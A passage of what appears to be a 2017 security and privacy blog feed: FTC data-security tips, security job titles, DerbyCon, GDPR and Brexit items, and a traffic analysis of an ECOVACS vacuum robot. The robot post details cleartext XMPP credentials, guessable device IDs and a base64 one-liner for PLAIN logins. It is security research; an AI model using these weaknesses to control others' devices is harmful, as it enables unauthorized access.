  • Don’t collect personal information you don’t need – The less confidential information a company holds, the less risk a company faces in the event of a breach. According to the FTC, the old practice of stockpiling sensitive information when it isn’t required doesn’t hold water in the cyber era. Businesses should limit what data they collect to reduce security risks and streamline compliance procedures.
  • Hold onto information only as long as you have a legitimate business need – Companies should regularly review the data they hold, assess which data should be maintained and carefully dispose of data that is no longer required to achieve a legitimate business need.
  • Don’t use personal information when it is not necessary – Sensitive data should not be used in contexts that create unnecessary risks. For example, a company that wishes to set up an app for its sellers to access customer accounts should not provide actual account files of customers to explain the scope of the project to an app developer.
  • Train your staff on your standards – And make sure they are following through. According to the FTC’s post, a company’s staff poses the greatest risk to the security of sensitive information in a company’s possession. At the same time, company staff also provide the number one defense against unauthorized access. Companies should train all staff, including temporary and seasonal workers, on standards to be upheld. Appropriate procedures to monitor staff compliance should be put in place as well. Additional training should be provided to existing staff to reinforce company rules, and companies should encourage employees to suggest ways of improving procedures.
  • When feasible, offer consumers more secure choices – Companies should analyze their data collection practices for both business operations and the products and services they offer to consumers. Products should be designed to collect sensitive information only if it is necessary for product functionality. Default settings and user setup interfaces should be designed in a way that makes it easy for consumers to choose more secure settings, and defaults should be set at more protective levels.

The FTC’s next blog post, to be published this Friday, August 4, will focus on sensibly controlling access to data.

On Titles, Jobs, and Job Descriptions (Not All Roles Are Architects) – The Falcon’s View

Folks: Please stop calling every soup-to-nuts, everything-but-the-kitchen-sink security job a "security architect" role. It's harmful to the industry and it's doing you no favors trying to find the right resources. In fact, please stop posting these "one role does everything security under the sun" positions altogether. It's hurting your recruitment efforts, and it makes it incredibly difficult to find positions that are a good fit. Let me explain...

For starters, there are generally three classes of security people, management and pentesters aside:
- Analysts
- Engineers
- Architects

(Note that these terms tend to be loaded due to their use in other industries. In fact, in some states you might even have to come up with a different equivalent term for positions due to legal definitions (or licensing) of roles. Try to bear with me and just go with the flow, eh?)

Analysts are people who think about stuff and write about stuff and sometimes help initiate actions, but they are not the implementers of security tools or practices. An analyst may or may not be particularly technical, depending on the nature of the role. For example, there are tons of entry-level SOC analyst positions today that can provide a first taste of infosec work life. You rarely need to have a lot of technical skills, at least initially, to land one of these gigs (this varies by org). Similarly, there are GRC analyst roles that tend not to be technical at all (despite often including "technical writing," such as for policies, in the workload). On the far end of the spectrum, you may have incident response (IR) analysts who are very technical, but again note the nature of their duties: thinking about stuff, writing about stuff, and maybe initiating actions (such as the IR process or escalations therein).

Engineers are people who do most of the hands-on work. If you're looking for someone to do a bunch of implementation work, particularly around security tools and tech, then you want a security engineer, and that should be clearly stated in your job description. Engineers tend to be people who really enjoy implementation and maintenance work. They like rolling up their sleeves and getting their hands dirty. You might also see "administrator" used in this same category (though that's muddy water as sometimes a "security administrator" might be more like an analyst in being less technical, skilled in one kind of tool, like adding and removing users to Active Directory or your IAM of choice). In general, if you're listing a position that has implementation responsibilities, then you need to be calling it an engineer role (or equivalent), not an analyst and certainly not an architect.

Architects are not your implementers. And, while they are thinkers who may do a fair amount of technical writing, the key differentiators here are that 1) they tend to be way more technical than the average analyst, 2) they see a much bigger picture than the average analyst or engineer, and 3) they've often risen to this position through one or both of the other roles, but almost certainly with considerable previous hands-on implementation experience as an engineer. It's very important to understand that your architects, while likely having a background in engineering, are unlikely to want to do much hands-on implementation work. What hands-on work they are willing/interested to do is likely focused heavily on proofs of concept (POCs) and testing new ideas and technologies. Given their technical backgrounds, they'll be able to go toe-to-toe on technical topics with just about anyone in the organization, even though they may not be able to sit down and crank out a bunch of server builds in short order any more (or, maybe they can!). A good security architect provides experiential, context-relevant guidance on how to design /secure/ systems and applications, as well as providing guidance on technology purchasing decisions, technical designs, etc. Where they differ from, say, GRC/policy analysts is that when they provide a recommendation on something, they can typically back it up with more than a flaccid reference to "best practices" or some other lame appeal to authority; they can instead point to proven experiences and technical rationale.

Going all the way back to before my Gartner days, I've long told SMBs that their first step should not be hiring a security manager, but rather a security architect who reports up through the IT food chain, preferably directly to the IT manager/director or CIO (depending on size and structure of the org). The reason for this recommendation is that small IT shops already have a number of engineers/administrators and analysts, but what they oftentimes lack is someone with broad AND deep technical expertise in security who can provide all sorts of guidance and value to the organization. Part and parcel to this is that SMBs especially do not need to build out a "security team" or "security department"! (In fact, I often argue only the largest enterprises should ever go this route, and only to improve efficiency and effectiveness. Status quo and conventional wisdom be damned.) Most small IT shops just need someone to help out with decisions and evaluations to ensure that the organization is making smart security decisions. This security architect role should not be focused on implementation or administration, but instead should be serving in an almost quasi-EA (enterprise architect) role that cuts across the entire org. In many ways, a security architect is a counselor who works with teams to improve their security decisions. It's common in larger organizations for security architects to have a focus on one part of the business simply as a matter of scale and supportability.

So that's it. Nothing too crazy, right? But, I think it's important. Yes, some of you may debate and question how I've defined things, and that's fine, but the main takeaway here, hopefully, is that job descriptions need to be reset again around some standard language. In particular, orgs need to stop listing a ton of implementation work for "security architect" roles because that's misleading and really not what a security architect does. Properly titling and describing roles is very important, and will help you more readily find your ideal candidates. Calling everything a "security architect" does not do anything positive for you, and it serves to frustrate and disenfranchise your candidate pools (not to mention wasting your time on screening).

fwiw. ymmv. cheers!

DerbyCon 7 Live Stream

If you weren't fortunate enough to get a ticket to DerbyCon this year, the conference will once again be live streaming talks. More information will be available closer to the conference at www.derbycon.com.

But did you know that (almost) every talk is also available for viewing after the conference is over? You can find past DerbyCon presentations here, as well as those from dozens of other conferences, or on IronGeek's YouTube channel here. Not as interesting or as much fun as being there, but if you're looking for good presentations to learn pen testing or blue teaming tactics, it's a great resource.

A security-minded guy forced to buy a WiFi-enabled cleaning robot

First I want to tell you all that I wanted a vacuum cleaning robot without an Internet connection, but I couldn’t find one which fulfilled my requirements. At first I thought the DEEBOT M81 from ECOVACS would be such a device (a vacuum and mop combo that can be carried between rooms, as it works randomly), but don’t buy it if you have stairs. On its first day alone at home it went down 2 floors; somehow it still looked okay and worked after the kamikaze, we just needed to search for it through the whole house. After some tests, I found out that it stops at the stairs 6 times and falls down the 7th or 8th time. Searching through the Internet showed me that I’m not the only one. The second problem was that configuring the timer differently for some days (like not cleaning on weekends) was not possible. After losing my last chance for a non-Internet-connected device, I went for the DEEBOT M81 Pro, which needs an Android or iPhone app and WiFi if you want to configure the timer to not clean on weekends. This is my story about – I guess – a typical IoT device.

 

The App – ECOVACS
After unpacking and charging the robot, I installed the app on my test mobile. Why not on my real mobile? Take a look at the required permissions:

I thought this was just an app to control my vacuum robot …. guess not. Anyway, I installed it on my test system and created a dummy user. Of course I took a look at the traffic. First it connects to ecosphere-app.ecovacs-japan.com,

where it does an HTTPS connect. Hm, maybe that’s better than I thought. The TLS config of the server is bad, but at least it’s encrypted – so there is still hope.

Looking at the other traffic, I saw an XMPP / Jabber connection (lbat.ecouser.net / 47.91.78.247), which was encrypted, but sadly with a self-signed certificate. I thought I’d take a look at that traffic via MitM later; let’s get it to work first.

Getting it to work
It looks like the robot creates an SSID for the app on the mobile to connect to after you press the WiFi button for more than 3 seconds, so the exchange of the WiFi password seems secure enough. But it took me almost an hour to get the robot to connect to my IoT network, and I didn’t find any information or tips online. I changed the following on my side to get it to work; maybe it helps somebody else:

  • I enabled the location stuff on the mobile (which I had disabled by default), as I remembered that the WiFi Analyser app always tells me to enable it to see WiFi networks.
  • I needed to change my IoT network to support legacy WiFi modes. My normal setup is:

    I needed to change it to the following in order for the robot to be able to connect:

Robot traffic

The first request from the robot after getting an IP address is an HTTP connection to lbo.ecouser.net (47.91.78.247) on port 8007.

Hey, we know that IP address and port – that’s the Jabber server the app also connects to. But before the robot connects to the Jabber server, it does a second HTTP request, this time to an IP address (47.88.193.19:8005) and not a DNS name. That’s interesting:

That looks like a check for newer firmware …. firmware updates unencrypted … what can possibly go wrong here? As the request currently returns no new firmware, I can’t look at that more closely – something for the future. Checking the Shodan info on that IP address is interesting: it runs a portmapper and an NTP server reachable from the Internet … is someone already using that as a DDoS amplifier? And I’m not even talking about the unconfigured nginx, which also leaks IP addresses in the certificate: IP Address:120.26.244.107, IP Address:121.41.41.198, IP Address:47.88.193.19

Let’s go back to the Jabber server the robot connects to. The app uses a channel “protected” by a self-signed certificate, but the robot connects completely in the clear – that’s nice, as I don’t even need a MitM attack. The Wireshark trace is so full of information that I’m really not sure what I can show you without making it too easy for you to control my robot.

The following is shown in the screenshot (which shows only a part of the communication):

  • The logon to the server via PLAIN authentication (see the sketch after this list), which consists of
    • username: the serial number of the device, which is also printed on the box the device is sold in.
    • password: looks like an MD5 hash of something, as it’s 32 hex chars – something to investigate
  • It shares its online status (presence status, in Jabber terms) with the app
  • It gets asked for a version – I guess the firmware version – which it returns as 0.16.46; hope that’s already stable
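Because the robot’s XMPP session is in the clear, those PLAIN credentials can be read straight out of a packet capture: SASL PLAIN is just base64 over NUL-separated username and password. A quick sketch with made-up values (the serial and hash below are invented):

printf '\0%s\0%s' 'E0001234567890123456' '0123456789abcdef0123456789abcdef' | base64

Decoding a captured blob is the same thing in reverse (base64 -d).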

Looking at later traffic, the following requests are issued by the app:

  • GetDeviceInfo
  • SetTime
  • GetChargeState
  • GetBatteryInfo
  • GetWKVer
  • GetError
  • GetOnOff
  • GetSched
  • GetLifeSpan

I didn’t control the device via the app, otherwise there would be many more commands.

Questions and thoughts

I don’t really see a pairing mechanism which makes sure that only the right app can control a given robot, so it may be possible to control other robots. As the user ID used on the Jabber server is just the serial number with @141.ecorobot.net/atom added, it should be easy to guess additional user IDs; there is no need to know the password of the robot. On the other side, it should be possible to create your own Jabber server and redirect the traffic to it. Also, writing a DIY app without all those app permissions should be possible and not too hard. The robot I bought is not that interesting for an attacker, as it cannot provide room layouts like the more expensive models do. The screenshots of the app show what is possible:

I guess I’ll wait for the next generation of robots, which provide a microphone and/or a camera – then it gets really interesting.

As I was able to configure the schedules via the app and set the time, I’ll test whether that still works when the robot is not able to connect to the Internet. If so, I’ll go that route and enable the Internet connection only when I need to change the schedules.

PS: you should really have a separate IoT network.

CIPL and AvePoint Launch Second Annual GDPR Organizational Readiness Survey

With less than one year to go before the EU General Data Protection Regulation (“GDPR”) comes into force, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams and AvePoint have launched the second annual GDPR Organizational Readiness Survey. Last year, over 220 predominantly multinational organizations participated in the study which focused on key areas of impact and change under the GDPR such as consent, legitimate interest, data portability, profiling, DPIAs, DPOs, data transfers and privacy management programs. This year’s study revisits these important areas of impact and further considers additional topics. 

Your organization’s participation in the study will help you to:

  • assess your current state of readiness for the GDPR;
  • benchmark your GDPR readiness in relation to industry peers;
  • gain insight into key changes and compliance obligations under the GDPR; and
  • determine next steps and requirements for your organization’s GDPR preparation plan.

The results, which will be kept anonymous, will be analyzed and used to publish an extensive overview on GDPR readiness, the CIPL & AvePoint Second Annual GDPR Benchmark Report. The report will provide your organization with insight into industry-wide GDPR preparedness levels, GDPR best practices as identified among participants and guidance for those looking to implement changes to their company-wide privacy management programs in anticipation of the GDPR. The report is expected for release in late fall of 2017.

Take the survey by August 31, 2017.*

*We ask that one representative from your organization complete the survey, and encourage you to work with the appropriate individuals in your organization to fill out the survey.

Lisa Sotto Discusses Identity Theft Prevention on Fox TV

On July 27, 2017, Lisa Sotto, chair of Hunton & Williams LLP’s Global Privacy and Cybersecurity practice, appeared live on Washington, DC’s Fox TV to discuss the ID theft issue involving former Dallas Cowboys player Lucky Whitehead, and to warn against the risk of identity theft. Sotto cautions that identity thieves who are determined and looking to do harm “will find [personal data].” According to Sotto, consumers “leave footprints everywhere online.” To mitigate the risk of identity theft, Sotto advises consumers not to freely provide their Social Security numbers, to shred bank account statements, to use complex passwords and to avoid public WiFi when checking bank accounts.

Watch her live interview.

UK House of Lords Recommends Pursuit of EU Adequacy Decision

On July 18, 2017, the European Union Committee of the UK’s House of Lords published its paper, Brexit: the EU data protection package (the “Paper”). The Paper urges the UK government to make good on its stated aim of maintaining unhindered and uninterrupted data flows between the UK and EU after Brexit, and examines the options available to ensure that this occurs. It warns that data flows have become so valuable to cross-border business that failure to establish an adequate framework could hamper EU-UK trade.

The Paper draws on the advice of a number of prominent UK data protection experts, including Hunton & Williams’ senior consultant attorney Rosemary Jay. The Paper’s main recommendation is that the UK seek to secure an adequacy decision from the European Commission, which would hold that the UK has an equivalent level of data protection safeguards as the EU, and would allow EU-UK data flows to continue without hindrance. As the Paper explains, this may be difficult. In particular, once the UK leaves the EU it will not be able to rely on the national security exemption in the Treaty on the Functioning of the European Union that is currently relied upon when the UK’s data retention and surveillance position is tested in the Court of Justice of the European Union. This effectively means that the UK will be held to a higher standard than EU Member States when its data protection regime is assessed for adequacy, which could cause issues in light of the recent introduction of the UK’s Investigatory Powers Act 2016. The Investigatory Powers Act permits the sort of bulk surveillance activities that were fundamental in invalidating the EU-U.S. Safe Harbor framework for data transfers. Without an adequacy decision, alternative methods of validating cross-border transfers, such as standard contractual clauses and binding corporate rules, are regarded as “sub-optimal” and could cause problems for companies offering products and services direct to EU consumers. The House of Lords also calls for data protection to form part of any transitional agreement reached with the EU, asserting that the adequacy process could only begin once the UK has left the EU, which would rule out the prospect of the UK immediately being held adequate.